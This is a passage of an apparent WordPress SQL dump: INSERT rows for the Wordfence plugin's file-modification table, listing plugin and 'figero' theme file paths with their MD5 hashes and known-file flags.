(0xd890565c133d106c53a98b6cbf4a9a26, 'wp-content/plugins/wordfence/lib/menuHeader.php', 1, 0x00000000000000000000000000000000, 0x107642a9be705f302aab6b38bf6f470f),
(0x8e524c5392662cfd4095884c3d10ec2e, 'wp-content/plugins/wordfence/lib/menu_activity.php', 1, 0x00000000000000000000000000000000, 0x4a88d5406bd182261060c5a4abd67274);
INSERT INTO `wp_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x80e615f12b0cc2e3a830a6b1c7d8c631, 'wp-content/plugins/wordfence/lib/menu_blockedIPs.php', 1, 0x00000000000000000000000000000000, 0xd444150aae36792158f65409aeda2650),
(0x488760488dc79bef4f2ebaeb56186943, 'wp-content/plugins/wordfence/lib/menu_countryBlocking.php', 1, 0x00000000000000000000000000000000, 0x46062eabb8fbefc83e111bfd21738879),
(0xba574ded8acb7b68a916f8dac0289d9e, 'wp-content/plugins/wordfence/lib/menu_options.php', 1, 0x00000000000000000000000000000000, 0x00742df9779c1306ca5d77480e6d090c),
(0xf34ba3927ab2993dbb47eae1f8f83869, 'wp-content/plugins/wordfence/lib/menu_passwd.php', 1, 0x00000000000000000000000000000000, 0x62eeb4b539065e015c31fdaf6b0d822e),
(0x2d3e0bfbea5dd4cd1bb50c326ab4b7d5, 'wp-content/plugins/wordfence/lib/menu_rangeBlocking.php', 1, 0x00000000000000000000000000000000, 0xb2bb1469cedcafb7eb141a10923199a1),
(0xb336630f491dfb0940db9e6f8eeef3e4, 'wp-content/plugins/wordfence/lib/menu_scan.php', 1, 0x00000000000000000000000000000000, 0xade3f73f929f2bad57dc4710f352127c),
(0xe2202af173135ce14f93e910690f6cea, 'wp-content/plugins/wordfence/lib/menu_scanSchedule.php', 1, 0x00000000000000000000000000000000, 0x7179aa6299e9a5e51de18c31f488bc73),
(0xe07ca4f31942bffdc7e9e33559931be8, 'wp-content/plugins/wordfence/lib/menu_sitePerf.php', 1, 0x00000000000000000000000000000000, 0xcdbf228ee3783cf3250ff9e2932bf534),
(0xe141160921669059eb6a3d0971517c48, 'wp-content/plugins/wordfence/lib/menu_sitePerfStats.php', 1, 0x00000000000000000000000000000000, 0x302701ba2bea48d6c10988a199a36922),
(0x938a6ee0aaee34b1db86c47802f280ce, 'wp-content/plugins/wordfence/lib/menu_twoFactor.php', 1, 0x00000000000000000000000000000000, 0x8ab54a8b6553e2685b811a5dd48ad480),
(0x0697c58aeb60f637a7fe54ea17b30361, 'wp-content/plugins/wordfence/lib/menu_whois.php', 1, 0x00000000000000000000000000000000, 0x26963aa91784ff6f8f751eec292f6e36),
(0x9d23f5f43ee4ab08ed9112d286c34b6c, 'wp-content/plugins/wordfence/lib/pageTitle.php', 1, 0x00000000000000000000000000000000, 0xe54812689249afe68d2153d93f3f106b),
(0x7ed3a4c377ec4accbc0384bf07a12ef9, 'wp-content/plugins/wordfence/lib/schedWeekEntry.php', 1, 0x00000000000000000000000000000000, 0x44d431bf0444319f9fc5e6b9e4202e56),
(0xa3dc0346a6b2998d987b0f90ecb4fd41, 'wp-content/plugins/wordfence/lib/sysinfo.php', 1, 0x00000000000000000000000000000000, 0x03d6a4bc438dbcbf43a857f9c1d94d1a),
(0xff87b7d64d7e0404eb5e78f9bc3b87f0, 'wp-content/plugins/wordfence/lib/unknownFiles.php', 1, 0x00000000000000000000000000000000, 0x41d17bd1c9ee1055c0ead07aa45b8ad8),
(0x4c52023751bce416546f08477cc41e7b, 'wp-content/plugins/wordfence/lib/viewFullActivityLog.php', 1, 0x00000000000000000000000000000000, 0xfcd8a4bd3df0f812c9f1aa1710b36f6c),
(0xc1d9b50a68b6cd4a78b56476cfd4835d, 'wp-content/plugins/wordfence/lib/wf503.php', 1, 0x00000000000000000000000000000000, 0x908fb144f81b47b1db155c34ca2ac694),
(0xbee132185d6871753ade543645d155b6, 'wp-content/plugins/wordfence/lib/wfAPI.php', 1, 0x00000000000000000000000000000000, 0x485571ad70838f0d8ba48e4cb3d978ba),
(0x0e1523e796addbadaa76220bfe974dbc, 'wp-content/plugins/wordfence/lib/wfAction.php', 1, 0x00000000000000000000000000000000, 0x40e292d35f05cfedad85f2b5c93e6a73),
(0xc98638a8c2d6c070c5bbd1b5020756fd, 'wp-content/plugins/wordfence/lib/wfActivityReport.php', 1, 0x00000000000000000000000000000000, 0xada0528b24cd81cb4efcca4464469cb6),
(0xdede8b19b3ad94310446f3f8ebdb6193, 'wp-content/plugins/wordfence/lib/wfArray.php', 1, 0x00000000000000000000000000000000, 0x13fada65a66d79b88656f44dbc1aacba),
(0x1cea2d3d5115b04377e0746e4ce0a123, 'wp-content/plugins/wordfence/lib/wfBrowscap.php', 1, 0x00000000000000000000000000000000, 0x80e4510f3f53586c86b534b65af5113e),
(0xab17d0e8125890920fb0d8024aa0fc70, 'wp-content/plugins/wordfence/lib/wfBrowscapCache.php', 1, 0x00000000000000000000000000000000, 0xf63e3cb187c57ccb7219471fff3c67fd),
(0xe4ea1fbf31fe5dc34d7cae4b1dd4465a, 'wp-content/plugins/wordfence/lib/wfBulkCountries.php', 1, 0x00000000000000000000000000000000, 0x1f7ddac3ec084dec8ab1a2b3f25f2339),
(0x1090b89cd2912de8ccf48a0d8a7b2cef, 'wp-content/plugins/wordfence/lib/wfCache.php', 1, 0x00000000000000000000000000000000, 0x5804a7490999bf0ff73d5cb5a788a199),
(0x5a34063c6e3f7f6598f11308b2198d8f, 'wp-content/plugins/wordfence/lib/wfConfig.php', 1, 0x00000000000000000000000000000000, 0x5a14139f21f057b0cb17a808b6ae22c0),
(0xb2fd8d4203b904365b738f964df77f18, 'wp-content/plugins/wordfence/lib/wfCountryMap.php', 1, 0x00000000000000000000000000000000, 0x5d68461f9333c7d00bac6bdd3b03b475),
(0x38c39b5a459151247d185550f654a3e0, 'wp-content/plugins/wordfence/lib/wfCrawl.php', 1, 0x00000000000000000000000000000000, 0xace40d230151120e10716fe17d763992),
(0xd878bcf8ceb2d0a6ace0a841098a3cea, 'wp-content/plugins/wordfence/lib/wfCrypt.php', 1, 0x00000000000000000000000000000000, 0x9ca9c157b4ed6b7cb8d329fec192342b),
(0xd94ae01cef9a5e1a37fc957547966b2b, 'wp-content/plugins/wordfence/lib/wfDB.php', 1, 0x00000000000000000000000000000000, 0xf304fe8cd42479bfa427bf5aeac24e23),
(0xf546a4eb1ac193e71eae43fcec31ae50, 'wp-content/plugins/wordfence/lib/wfDict.php', 1, 0x00000000000000000000000000000000, 0x052a90ee1736411c7474ebe623c31314),
(0xbaedcc4130668efd6660c2204bc7817d, 'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php', 1, 0x00000000000000000000000000000000, 0x1a8c82d1e9f8462501cbe5bfc7e0917c),
(0x3d1e391e299c911ead29c25c1fd51596, 'wp-content/plugins/wordfence/lib/wfGeoIP.php', 1, 0x00000000000000000000000000000000, 0xa34a8e9d1c5c1b7ddfde7add59258151),
(0x50c64dee1ad649ccb88d10ddad596072, 'wp-content/plugins/wordfence/lib/wfHelperString.php', 1, 0x00000000000000000000000000000000, 0xa14f5688466144118e56de349834dcaa),
(0xd36a7313a49e7732f9ec1270aefd7153, 'wp-content/plugins/wordfence/lib/wfIssues.php', 1, 0x00000000000000000000000000000000, 0x399e9403998f65b2d206a1e0ae6b3764),
(0xf38ad8a05dd4669588f050f4a2860483, 'wp-content/plugins/wordfence/lib/wfLockedOut.php', 1, 0x00000000000000000000000000000000, 0xdddb57d1b1d458f1b2652044a3c0189a),
(0xf2da77ce2b07222bfa24e319ac5e1cb8, 'wp-content/plugins/wordfence/lib/wfLog.php', 1, 0x00000000000000000000000000000000, 0x6f1a8c68cd15332f126ff8276c6701d8),
(0x7f5e6bbfd6aa44760e07053605975290, 'wp-content/plugins/wordfence/lib/wfRate.php', 1, 0x00000000000000000000000000000000, 0x1ed3b2accb3aa5275f17fed90b151747),
(0xefde8c742be95cf52bc65861865a551b, 'wp-content/plugins/wordfence/lib/wfScan.php', 1, 0x00000000000000000000000000000000, 0xd91167e3c42eada6c60d532216fc3ba6),
(0xefef365887d4aa34f1e35b5f879d3d74, 'wp-content/plugins/wordfence/lib/wfScanEngine.php', 1, 0x00000000000000000000000000000000, 0x94b1f9657bf6c5b3049fd6fc78dae999),
(0x62ca03a5f1487a665798a085ad67779b, 'wp-content/plugins/wordfence/lib/wfSchema.php', 1, 0x00000000000000000000000000000000, 0x09af6ea9f25e01e400a02ea1467db1a0),
(0x9aea8a688b4c8dbcb24a48ff58230e30, 'wp-content/plugins/wordfence/lib/wfUnlockMsg.php', 1, 0x00000000000000000000000000000000, 0x15cfa541bab45d51b421793e10c94059),
(0x89aa65c45cabd431e174c68bdc3c0984, 'wp-content/plugins/wordfence/lib/wfUpdateCheck.php', 1, 0x00000000000000000000000000000000, 0x20973b6aac74b672a2fe9fe6ec5b1063),
(0xa8511808340439e3f31e4c7ad3144ab5, 'wp-content/plugins/wordfence/lib/wfUtils.php', 1, 0x00000000000000000000000000000000, 0x06f96b7a21346d4399be8be99b6c2bd0),
(0xe565c590c2faf4fcfd6e03b7859f41db, 'wp-content/plugins/wordfence/lib/wfView.php', 1, 0x00000000000000000000000000000000, 0xe7ab239392287cb7ded3e441457cc488),
(0xaacbd9767b43abc0baced2a7808e3449, 'wp-content/plugins/wordfence/lib/wfViewResult.php', 1, 0x00000000000000000000000000000000, 0x09714e0bc1ecba4b383019c14fabb71d),
(0x0fc7dda13dbdbd4e7817bc874bd4602a, 'wp-content/plugins/wordfence/lib/wordfenceClass.php', 1, 0x00000000000000000000000000000000, 0xfb71a821d399ba088940291b96540c88),
(0xc16b486de531d30ef36030d1b9af965f, 'wp-content/plugins/wordfence/lib/wordfenceConstants.php', 1, 0x00000000000000000000000000000000, 0x6914ed8783cf1da443dafdb0e521ac30),
(0x81d558f9e2cfe02d9f34a44afc5f8333, 'wp-content/plugins/wordfence/lib/wordfenceHash.php', 1, 0x00000000000000000000000000000000, 0xdd696a045badfc5a833c8c52cf3622b9),
(0x1c7a987c2a369e19535c0235b7e3af33, 'wp-content/plugins/wordfence/lib/wordfenceScanner.php', 1, 0x00000000000000000000000000000000, 0xdc15d7aa60e5daa99231fcf6b803e7e6),
(0x68bb3cb25d9394ec4f704e4305c6b4e6, 'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php', 1, 0x00000000000000000000000000000000, 0x76cd234171274989624f0fb5f276b844),
(0xbf76e997464997cb3268b4cff8a46ec1, 'wp-content/plugins/wordfence/readme.txt', 1, 0x00000000000000000000000000000000, 0x453713fee52b5c37791a6604e317261c),
(0xef3b0c4ce17489d7ac43b0839094c9a3, 'wp-content/plugins/wordfence/tmp/.htaccess', 1, 0x00000000000000000000000000000000, 0xb749a07a7ed269b62c1b4c9effe81e04),
(0x8ebb4757ff10b76086e74c688d3b908d, 'wp-content/plugins/wordfence/tmp/configCache.php', 0, 0xc3b80753e7452f6ac1342ef77b30b79b, 0xc3b80753e7452f6ac1342ef77b30b79b),
(0x543f843f3a71d7ae50c3f3616827abab, 'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php', 1, 0x00000000000000000000000000000000, 0x320ec877fc4a8b1bc36552a57d1c02b9),
(0x05488393ca0c63e5c1a449b24a25b548, 'wp-content/plugins/wordfence/views/reports/activity-report-email.php', 1, 0x00000000000000000000000000000000, 0x25d898fd6f8e879ac6a8e03cb85160b5),
(0x1f4ea1642352ad872babc1720073045b, 'wp-content/plugins/wordfence/views/reports/activity-report.php', 1, 0x00000000000000000000000000000000, 0xa50f92c82e02c94f44e9b048af69f7ee),
(0x4523cdd5e72d7633371903d936ebc5a4, 'wp-content/plugins/wordfence/wordfence.php', 1, 0x00000000000000000000000000000000, 0xb12512a91ff4f6a183305aa07b5c04ed),
(0xecf2b86368ff9defc26ddaede4bec3f8, 'wp-content/themes/figero/404.php', 1, 0x00000000000000000000000000000000, 0xa28e40b6aaf3ef59bac8e3a185aca5eb),
(0x703dc48e1c876d383c8895d10880a3b1, 'wp-content/themes/figero/_style.css', 0, 0x32121e9d315beaa023fd15c09245acff, 0x32121e9d315beaa023fd15c09245acff),
(0xd8dbea4fee20410ba00ad54fce07aa4a, 'wp-content/themes/figero/archive.php', 1, 0x00000000000000000000000000000000, 0x3fb44cd9679d89e4e7264eeb16d0e10a),
(0xcb7ad6fec6fac651d8b827aefe05ffb8, 'wp-content/themes/figero/author.php', 1, 0x00000000000000000000000000000000, 0x483c8af3a4445c889005229da7dda6aa),
(0x235e642611e5387ef3b8720d9503ca02, 'wp-content/themes/figero/blog.php', 1, 0x00000000000000000000000000000000, 0x8f111421d0e8823d917050375e983489),
(0xa047dfda3c226f0dd006b74f5c3a5c6c, 'wp-content/themes/figero/category.php', 1, 0x00000000000000000000000000000000, 0x3dd67af5df4a6ad7231510d92e5ae9be),
(0xaacbb2b2c42c8cb024b99ba79162f4e5, 'wp-content/themes/figero/changelog.txt', 1, 0x00000000000000000000000000000000, 0xb6b0da507e0b3ee5bbc21d37903f8ffb),
(0x1fb507efc1b5b8a2b607ec3a5f1aa8ef, 'wp-content/themes/figero/comments.php', 1, 0x00000000000000000000000000000000, 0x62facb9609ecbc013475e89ec1fc8304),
(0x0278143f8f0b76386308d4f2e6083610, 'wp-content/themes/figero/css/960_24_col.css', 1, 0x00000000000000000000000000000000, 0x83e79d4065a3da2d4c35434293ab6a7f),
(0xfe22facbce7dc6c14b176e5d1e1b353c, 'wp-content/themes/figero/css/reset.css', 1, 0x00000000000000000000000000000000, 0x4d24e1653dfaaad40cce840ea33e2847),
(0x66ea9d8304f0a43cfc9251037acb5a08, 'wp-content/themes/figero/editor-style.css', 1, 0x00000000000000000000000000000000, 0x3978f2d4ae34a7da712aa3b7218b902b),
(0xa2f6520cbc01bf459f4aa7aed41a8be3, 'wp-content/themes/figero/footer.php', 0, 0x00a371ce899aeef5b3a5d0c10d99deec, 0x00a371ce899aeef5b3a5d0c10d99deec),
(0x46d002358af6e1231db421af18ec3945, 'wp-content/themes/figero/front-page.php', 0, 0x8c1289de6f55920dd4075266b243caeb, 0x8c1289de6f55920dd4075266b243caeb),
(0x5a64fcf6e10e07001f199e59db8f4f4c, 'wp-content/themes/figero/functions/admin-functions.php', 1, 0x00000000000000000000000000000000, 0x33d9ce3553defcdb322221390bf1b0b8),
(0x7d15faf5c9bc5363e09ff7e9e8801e6c, 'wp-content/themes/figero/functions/admin-interface.php', 1, 0x00000000000000000000000000000000, 0x8404ebe37c30e6f5dff1e38293615ac1),
(0xa6552d0eb00278cd83c643e2c281d8b6, 'wp-content/themes/figero/functions/admin-style.css', 1, 0x00000000000000000000000000000000, 0x660f821021fb25bdcc18583528baa689),
(0x66c9e6e6e32c92b1dc94d920472c4e32, 'wp-content/themes/figero/functions/css/colorpicker.css', 1, 0x00000000000000000000000000000000, 0x93b007836cafea87253f845c5c360e64),
(0xa58412b39719170d0506933bc77dfd5c, 'wp-content/themes/figero/functions/figero-functions.php', 1, 0x00000000000000000000000000000000, 0xa2006b2969b9745f86b2aec7bda8a4c9),
(0x26b8ccf68e6757b169f66f5adc1d6b1b, 'wp-content/themes/figero/functions/images/2cl.png', 1, 0x00000000000000000000000000000000, 0x6d309b5032c6981e7f0f947b014efaf7),
(0xcd9a50a6a7d1a712043307597216207e, 'wp-content/themes/figero/functions/images/2cr.png', 1, 0x00000000000000000000000000000000, 0x8236f70c466b02601d9b9357467d0735),
(0x2071b0da49ae8a944da93aa71719030d, 'wp-content/themes/figero/functions/images/3cm.png', 1, 0x00000000000000000000000000000000, 0x336290ffeb0804c86ae7e2eb9346adab),
(0xefe05ff4dc48a69130b50272b89e5c11, 'wp-content/themes/figero/functions/images/3cr.png', 1, 0x00000000000000000000000000000000, 0x01eaaf0c119937bb69edd4518b3a7335),
(0x8dc60225c8239dc744e3c4a0ad03b68b, 'wp-content/themes/figero/functions/images/accept.png', 1, 0x00000000000000000000000000000000, 0xb1225bb3ee3bde028fd50a9b962288ef),
(0x60d10acbcebee53108cb24718a045125, 'wp-content/themes/figero/functions/images/andrina.png', 1, 0x00000000000000000000000000000000, 0x8cd98715a0632f6cfd926a8747d36238),
(0xcbc10d66e48b55326758edf721205bea, 'wp-content/themes/figero/functions/images/cloriato.jpg', 1, 0x00000000000000000000000000000000, 0x816bee2c696e3dc61129d883eff96c83),
(0x7ecf4ef0001ea4459ce29368248e1a0b, 'wp-content/themes/figero/functions/images/colorpicker/blank.gif', 1, 0x00000000000000000000000000000000, 0xd60a1cb0e1e9b9a8abc64214bb749a55),
(0x8943073fe55e9d974f48f0680e5d9104, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_background.png', 1, 0x00000000000000000000000000000000, 0xa79f1a2a81bfe3ed1c2ca4c41b8e1fbf),
(0x1e3be7011314882754fb0a2ee5d43406, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hex.png', 1, 0x00000000000000000000000000000000, 0x16d6870c36e379c06fb26ebd2e16bf44),
(0x7a5e77942d3df2974a0f5de09412eedf, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hsb_b.png', 1, 0x00000000000000000000000000000000, 0x2be4e81b4a5c98674abe6fc60b447e9a),
(0xb9f74d85112e5f9e323312c661cbdfd8, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hsb_h.png', 1, 0x00000000000000000000000000000000, 0xd47409a203bedc76b26dc60b71a69f6b),
(0xd28ae462c44ac9001eb4e5964e71fa88, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_hsb_s.png', 1, 0x00000000000000000000000000000000, 0x5ff5e43ab6b7b41b6123bfab692a9b19),
(0x015756f4766ed3cfdc86c04dde68e569, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_indic.gif', 1, 0x00000000000000000000000000000000, 0xf485d07540a89502e36dc1a55cec05d0),
(0x4faacf9d288ee7d4715b8e28e0d1c17c, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_overlay.png', 1, 0x00000000000000000000000000000000, 0xc7a33805ffda0d32bd2a9904c8b02750),
(0xc9f20bd99c3f36527b322b742f0df972, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_rgb_b.png', 1, 0x00000000000000000000000000000000, 0x2be4e81b4a5c98674abe6fc60b447e9a),
(0xe8be895603c2cbe8ec416471bd5a6e20, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_rgb_g.png', 1, 0x00000000000000000000000000000000, 0xdc17f953a6febbe174e92b54690586c3),
(0x43283fac96bd0ef8bacd6262509d67f8, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_rgb_r.png', 1, 0x00000000000000000000000000000000, 0x87eeb205d093b713b68a341771f4ee27),
(0x33e24ba97e27f3fbf3e23ee6315c5bb0, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_select.gif', 1, 0x00000000000000000000000000000000, 0xcec464162af0cce10348e7bb7701ef86),
(0xc77d4c004f6f30f71ccaf44e60ad0cca, 'wp-content/themes/figero/functions/images/colorpicker/colorpicker_submit.png', 1, 0x00000000000000000000000000000000, 0x12d1746e6b52e007f1b78d772d9248ba),
(0x7e3b4d741cd4192e83a0cba02c1991dc, 'wp-content/themes/figero/functions/images/colorpicker/select.png', 1, 0x00000000000000000000000000000000, 0xe88aeeb3bfac6ed9a684a0a43fdc88c4),
(0x808026967c409f12d6ea4e1926c12448, 'wp-content/themes/figero/functions/images/colorway.jpg', 1, 0x00000000000000000000000000000000, 0x1256774cb2b2d4095039c5105eac7bc3),
(0x0c43bf13df47f549743320d6cf0d3711, 'wp-content/themes/figero/functions/images/dzonia.jpg', 1, 0x00000000000000000000000000000000, 0xc640a65914e0f7797bcf13b6a46d8c85),
(0xa9acbfb8bbe1b8cfaeaee091e786452e, 'wp-content/themes/figero/functions/images/favicon.ico', 1, 0x00000000000000000000000000000000, 0xa2dec47a071074d1fd4e7309c408479c),
(0xdde41b075dacc3a8c50fb4541bae3585, 'wp-content/themes/figero/functions/images/ico-close.png', 1, 0x00000000000000000000000000000000, 0xca91c143a98eb512fa961ab1f0bdd1f0),
(0xe6a7b451a6ecacd6a19dbb5b994887b6, 'wp-content/themes/figero/functions/images/ico-docs.png', 1, 0x00000000000000000000000000000000, 0xbe967fd561ee3a034949f9e691729b9c),
(0x33855f989b7bb6f003ce54a2c4165d2f, 'wp-content/themes/figero/functions/images/icon-add.png', 1, 0x00000000000000000000000000000000, 0x1988c3cc1384a3ac9b9a4129183248f3),
(0x38c367f00f0d1d0809e492685c615d85, 'wp-content/themes/figero/functions/images/icon-edit.png', 1, 0x00000000000000000000000000000000, 0x97176626eef35c7beb4f05a850325042),
(0xa36647b3574bf4c6ff2042c08576b5c6, 'wp-content/themes/figero/functions/images/icon_option2.png', 1, 0x00000000000000000000000000000000, 0xbb7bf03dd044b11aa1f74dea63415c8b),
(0x113b7c2c50dd5785cb28b0261c997f33, 'wp-content/themes/figero/functions/images/inkthemes-logo.png', 1, 0x00000000000000000000000000000000, 0xbbc6043d4bd28ef1cc99662b350022a6),
(0xc2b7007dd1cadde215acfc6886e317ff, 'wp-content/themes/figero/functions/images/loading-bottom.gif', 1, 0x00000000000000000000000000000000, 0xe87507f98b78b46470a9ad225b9fd26f),
(0xfa59c83c0cb2a290da81cc124458f1d2, 'wp-content/themes/figero/functions/images/logo.png', 1, 0x00000000000000000000000000000000, 0xf4cc5aeb66086df21005368d41eaa642),
(0x2212cb843c8642dee4a4f83cba0135ad, 'wp-content/themes/figero/functions/images/themia.jpg', 1, 0x00000000000000000000000000000000, 0x0c3908c0381ffd47377c6ec07327f0d8),
(0x2a02a62dfbb7de5dbc04c34f7f268ea3, 'wp-content/themes/figero/functions/images/ui-bg_flat_0_aaaaaa_40x100.png', 1, 0x00000000000000000000000000000000, 0x2a44fbdb7360c60122bcf6dcef0387d8),
(0xe8e567a9888d148e1f993fd886dea537, 'wp-content/themes/figero/functions/images/warning.png', 1, 0x00000000000000000000000000000000, 0x52518eb7721ea8209114bd23fdd3e380),
(0x9f87449494a974200a83d05e57d57037, 'wp-content/themes/figero/functions/images/wrench.png', 1, 0x00000000000000000000000000000000, 0x891212eeda066b3aefb5fc0505ee74c0),
(0x1f1b0aa36513b9a1ff4ee39010b16ee0, 'wp-content/themes/figero/functions/js/ajaxupload.js', 1, 0x00000000000000000000000000000000, 0x2cbfc5e7012dac113e1b07e5a19736fd),
(0x1c2cb35f3cbdf78cb8c141b0084012cf, 'wp-content/themes/figero/functions/js/colorpicker.js', 1, 0x00000000000000000000000000000000, 0xb7b867ffc0579bfd61842a2b3f5cb2e1),
(0x94f80373fd264200fb134de277c50862, 'wp-content/themes/figero/functions/js/jquery.maskedinput-1.2.2.js', 1, 0x00000000000000000000000000000000, 0x141409f34e073384c93adb553c28b420),
(0xe98cce660c3c4158e0460c77282a70bf, 'wp-content/themes/figero/functions/js/script.js', 1, 0x00000000000000000000000000000000, 0xce0345032566d2ba43796ce52982c234),
(0xac28dcfb41629fccc54f3b00e067b284, 'wp-content/themes/figero/functions/theme-options.php', 1, 0x00000000000000000000000000000000, 0xaf660fb1627b56cb3a42125143d53b6d),
(0x7de486dd8ffcd9dd00f5889ec767affa, 'wp-content/themes/figero/functions/theme-page-style.css', 1, 0x00000000000000000000000000000000, 0x1562cb4dc1e86033f39abbb7dbd50336),
(0x903f74a7c182fdd8796b7c21c9d2c351, 'wp-content/themes/figero/functions/themes-page.php', 1, 0x00000000000000000000000000000000, 0x9c63647e506818c6566500c1c9522092),
(0x3c5e48160498b10efdab901835bfca5d, 'wp-content/themes/figero/functions.php', 1, 0x00000000000000000000000000000000, 0xbab8093a7672eef51b174649ddc42d0f),
(0x225a423ddc2a60584358b080ca596786, 'wp-content/themes/figero/header.php', 0, 0xa7bd246a6244e60114c774a8e6dacd17, 0xa7bd246a6244e60114c774a8e6dacd17),
(0x205e49363860ac30a7fab90e787a1dac, 'wp-content/themes/figero/images/1211.png', 1, 0x00000000000000000000000000000000, 0xaafdf1830da4e720115e3686b5fa44c8),
(0xb61259207220cbd1e8c9d8b3822bb2d7, 'wp-content/themes/figero/images/12_col.gif', 1, 0x00000000000000000000000000000000, 0xde99722a80cf0f0b6c75ed07e20b3e89),
(0xb4a5ca84a970f2d56768e65240a497f8, 'wp-content/themes/figero/images/16_col.gif', 1, 0x00000000000000000000000000000000, 0xa1979801ea5e984ba89ca43ab6e9ee49),
(0xb496f1912cb59d8a093f961b8b8f1974, 'wp-content/themes/figero/images/2.png', 1, 0x00000000000000000000000000000000, 0xf79322dcaeb9e931d15d143426ff8912),
(0x4fa3fd42792ac1c893a9f1e55d0cb3c5, 'wp-content/themes/figero/images/24_col.gif', 1, 0x00000000000000000000000000000000, 0x822e5ffc9d0a63a0b58fc64514d0f798),
(0x301633d4a2650c6d1f54c204938e78ac, 'wp-content/themes/figero/images/5.png', 1, 0x00000000000000000000000000000000, 0x46a495d7089f79555c39a08936361e6f),
(0x7de4a883f3dea30e586ce6a83a4f5e77, 'wp-content/themes/figero/images/6.png', 1, 0x00000000000000000000000000000000, 0xb92a6a999949fff8f2537b9b50f27d60),
(0x73945cd80c18afa590dd640f8547d002, 'wp-content/themes/figero/images/7.png', 1, 0x00000000000000000000000000000000, 0xeb37ed71b03bc32d925bd68eea735c5e),
(0x1ebae5697bc8dcf347ecb1fd125845d2, 'wp-content/themes/figero/images/SMS.png', 1, 0x00000000000000000000000000000000, 0x9a86476827b56348d992e2584cd0cd6e),
(0x740c9d13a495f2fc9b85cbd05462bb57, 'wp-content/themes/figero/images/arrows.png', 1, 0x00000000000000000000000000000000, 0x7efd89773fbb1467ec358b56b77c2393),
(0x5f565481b2279f81a0598186f228ccc3, 'wp-content/themes/figero/images/backg2.png', 1, 0x00000000000000000000000000000000, 0x0c4a4633ea5d8f6d095997ebd0495397),
(0x9f7f1a1cf878a2dba9b0637606378a04, 'wp-content/themes/figero/images/background.png', 1, 0x00000000000000000000000000000000, 0xda60856b028863ded0b742f576824ab6),
(0xacc2fbb08f1069075067ee9a7dd17f13, 'wp-content/themes/figero/images/black-bg.png', 1, 0x00000000000000000000000000000000, 0xe7b5e316e18b5fadd31690f2d0dc521b),
(0x651bb95f2a5aeb5a5c217b198a62d2d3, 'wp-content/themes/figero/images/blank.png', 1, 0x00000000000000000000000000000000, 0x737358b32753478672db7e6b915b1784),
(0x648ec0019ac146a0111af3af2f0a9916, 'wp-content/themes/figero/images/blockqoute.png', 1, 0x00000000000000000000000000000000, 0xae07f03962d785cdfd1df7c25c66983d),
(0x154dd3e877b9b8f7b24168a79520dff0, 'wp-content/themes/figero/images/blog-list-img.png', 1, 0x00000000000000000000000000000000, 0x2fe6476a11485b189f1e4e1c9b533d76),
(0x5c4947031ae60ab4fd99cba55a52511e, 'wp-content/themes/figero/images/blog-list-inner-img.png', 1, 0x00000000000000000000000000000000, 0x7d72cc52ef16a4335364dff145286410),
(0x11cfd26aa17f8fa0e5233e03850de0dc, 'wp-content/themes/figero/images/blog-sidelist-img.png', 1, 0x00000000000000000000000000000000, 0xa7f00fda392e3014642ac8a00d55fc3d),
(0xc5e53dc49f5f7b53d367ab72f9d206a6, 'wp-content/themes/figero/images/blog-strip.png', 1, 0x00000000000000000000000000000000, 0x85100de1f693668aefdb433440c3b7b1),
(0xe97d1aa3ebc721d2de1ca3236285a0f7, 'wp-content/themes/figero/images/bottom-footer-blue.png', 1, 0x00000000000000000000000000000000, 0xb2651fa239a68b8e72db5e4687619529),
(0x1de40e65377dd997c006cc1f4631d674, 'wp-content/themes/figero/images/bottom-footer-brown.png', 1, 0x00000000000000000000000000000000, 0x5eeb02e25e6f648dbb2ead66e55e1cb8),
(0x50981a4b432ac69b213cd1b63ff3524c, 'wp-content/themes/figero/images/bottom-footer.png', 1, 0x00000000000000000000000000000000, 0xa78c4ba05d111e30f62d5d6e92cdb0bb),
(0x849a5c720f707fa913d8b0beea79a570, 'wp-content/themes/figero/images/box-background.png', 1, 0x00000000000000000000000000000000, 0x5b983eb64d94917b9a1d996d9cca9f5d),
(0x04bdd1fcbd92dfca8b2214a21c3f85fa, 'wp-content/themes/figero/images/boxbg.png', 1, 0x00000000000000000000000000000000, 0x60790708fe13821a63e33a27f5d602d9),
(0xf56cf47e83e708201560e5449282741b, 'wp-content/themes/figero/images/bt-submit-end (1).png', 1, 0x00000000000000000000000000000000, 0x325b4c26cdd621b79a5c383d8183b4bd),
(0x2b3d0e2b52fdeb9f63a20cbcb4e5d602, 'wp-content/themes/figero/images/bt-submit-end.png', 1, 0x00000000000000000000000000000000, 0x325b4c26cdd621b79a5c383d8183b4bd),
(0x8c0330acd4a9a7fcc6c328e27f0a2f10, 'wp-content/themes/figero/images/bt-submit-over.png', 1, 0x00000000000000000000000000000000, 0x3f26a5ed0caf75a51e8cabde7d999079),
(0x77ce6ec9755c82c872feb8e6f5d46eee, 'wp-content/themes/figero/images/bt-submit.png', 1, 0x00000000000000000000000000000000, 0x347c04a35a68d65250e5a3364abbf1ad),
(0x3a5f82f0baeaa84b84a88d7ee5876da3, 'wp-content/themes/figero/images/buttons.png', 1, 0x00000000000000000000000000000000, 0xc0b0b5072c6e1bd145c6a56e0b395e3a),
(0x8f5db5097457c4d9072680e70ce56501, 'wp-content/themes/figero/images/cat-img-1.png', 1, 0x00000000000000000000000000000000, 0x960a7e1e697ca489430f1093068fe845),
(0x500955014cdee03a32685616f1a72bf9, 'wp-content/themes/figero/images/cat-img-2.png', 1, 0x00000000000000000000000000000000, 0x003b54e9fbb926efb44269f4dd2abca5),
(0x734fae1e53b55a7c9b7cedac346e4528, 'wp-content/themes/figero/images/close.png', 1, 0x00000000000000000000000000000000, 0xf2aace763cfcc4d6f3427a8a0842e55c),
